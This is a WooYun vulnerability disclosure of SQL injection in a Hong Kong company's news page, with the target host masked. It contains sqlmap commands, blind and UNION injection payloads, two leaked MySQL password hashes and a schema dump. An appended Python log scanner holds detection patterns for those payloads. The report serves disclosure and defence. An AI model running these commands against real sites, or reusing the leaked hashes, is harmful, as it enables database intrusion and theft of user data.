Vulnerability summary

Defect ID: wooyun-2015-0151431

Title: SQL injection at one location of 海港錦鯉集團 (rdsadmin password hash leaked / 55 tables / 220,000 users' IP addresses and session IDs leaked) (Hong Kong)

Vendor: 海港錦鯉集團

Author: 路人甲

Submitted: 2015-11-03 09:54

Fixed: 2015-12-19 17:48

Published: 2015-12-19 17:48

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: handed to a third-party partner organisation (hkcert, Hong Kong Internet Emergency Response Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-03: details sent to the vendor, awaiting vendor handling
2015-11-04: vendor confirmed; details disclosed to the vendor only
2015-11-14: details disclosed to core white hats and domain experts
2015-11-24: details disclosed to regular white hats
2015-12-04: details disclosed to intern white hats
2015-12-19: details disclosed to the public

Summary:

SQL injection at one location of 海港錦鯉集團 (rdsadmin password hash leaked / 55 tables / 220,000 users' IP addresses and session IDs leaked)

Details:

URL: http://**.**.**.**/news_details.php?news_id=121

python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch --users --passwords


python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch -D koi_db -T user_login -C ipaddress,logintime,username,usession_id --start 1 --stop 100 --dump


back-end DBMS: MySQL 5.0.12
Database: koi_db
+------------+---------+
| Table | Entries |
+------------+---------+
| user_login | 225089 |
+------------+---------+

Proof:

---
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_id=121 AND 8135=8135
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
database management system users [2]:
[*] 'koidbuser'@'%'
[*] 'rdsadmin'@'localhost'
database management system users password hashes:
[*] koidbuser [1]:
password hash: *B4424A0597FD6459C51B530FDC8831BF925CEFAF
[*] rdsadmin [1]:
password hash: *3F809E3C7A7660DFADEC1A097315F38B7F26576E


available databases [8]:
[*] information_schema
[*] innodb
[*] koi_db
[*] koishop
[*] mysql
[*] pennydb
[*] performance_schema
[*] tmp
sqlmap resumed the following injection point(s) from stored session:
Database: koi_db
[55 tables]
+---------------------------+
| activation |
| address_name |
| address_province |
| adv |
| alipay |
| anwser |
| banner |
| banner_old |
| banner_tmp |
| banner_tmp_old |
| bid |
| bid_action |
| bid_image |
| bid_temp |
| bid_title |
| bid_title_old |
| calendar |
| category |
| diary |
| edm_campaign |
| game |
| game_content |
| game_score |
| game_score_content |
| gift |
| gift_action |
| internal_photo |
| internal_photo_content |
| knowledge |
| location |
| mem_temp |
| member |
| news |
| paypal_bid |
| paypal_cart_info |
| paypal_payment_info |
| point_history |
| product |
| product_image |
| question |
| salesorder |
| salesorder_items |
| sc_main |
| sc_users |
| sms_verify |
| staff |
| table_forum |
| table_log |
| user_login |
| votevideo |
| votevideo_title |
| votevideo_type |
| votevideoact |
| votevideoact_bak_20131129 |
| votevideoact_bak_20141229 |
+---------------------------+
sqlmap resumed the following injection point(s) from stored session:
Database: koi_db
Table: user_login
[4 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ipaddress | varchar(50) |
| logintime | datetime |
| username | varchar(255) |
| usession_id | varchar(100) |
+-------------+--------------+



The first 100 users were selected for the dump.

Database: koi_db
Table: user_login
[100 entries]

Fix recommendation:

Deploy a WAF.
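A WAF blocks only the request shapes it recognises, so the finding should also be detectable from the web server's own logs. As an added example (not part of the original report and not the vendor's code), the Python below scans constructed Apache combined-log lines for the three payload shapes sqlmap used here (--technique=BTU: boolean-based, time-based and UNION) and flags any news_id that is not a plain integer; the IP, timestamps and user-agent are placeholders, and the user-agent is deliberately not used, since the scan ran with --random-agent.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines (placeholder IP, timestamps, user-agent;
# not data from the report). The news_id values mirror the three sqlmap payload
# shapes shown on this page; the first line is a benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Nov/2015:09:40:01 +0800] "GET /news_details.php?news_id=121 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2015:09:40:02 +0800] "GET /news_details.php?news_id=121%20AND%208135%3D8135 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2015:09:40:03 +0800] "GET /news_details.php?news_id=121%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29HFsw%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Nov/2015:09:40:09 +0800] "GET /news_details.php?news_id=-4801%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CCONCAT%280x716a7a6b71%2C0x41%2C0x71786b6271%29%2CNULL%2CNULL--%20- HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# One signature per technique sqlmap was told to use here (--technique=BTU).
# Order matters: a UNION payload also contains SELECT, so test it first.
TECHNIQUES = [
    ("union", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),
]

def classify_value(value):
    """Return None for a plain integer id, otherwise the suspected technique."""
    if re.fullmatch(r"-?\d+", value.strip()):
        return None
    for name, pattern in TECHNIQUES:
        if pattern.search(value):
            return name
    return "non-integer"  # not one of the known shapes, still worth review

def scan_log(text, param="news_id"):
    """Return (ip, timestamp, technique, decoded value) for suspicious requests."""
    # Match on the decoded parameter value, not the user-agent: the report's
    # scan used --random-agent, so the UA looked like an ordinary browser.
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            verdict = classify_value(value)
            if verdict is not None:
                findings.append((m.group("ip"), m.group("ts"), verdict, value))
    return findings
```

Run against SAMPLE_LOG the scan yields three findings, one per technique, and none for the benign first request.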

Copyright notice: when reposting, credit the source 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-11-04 17:47

Vendor reply:

The incident has been reported to the relevant organisation.

Latest status:

None yet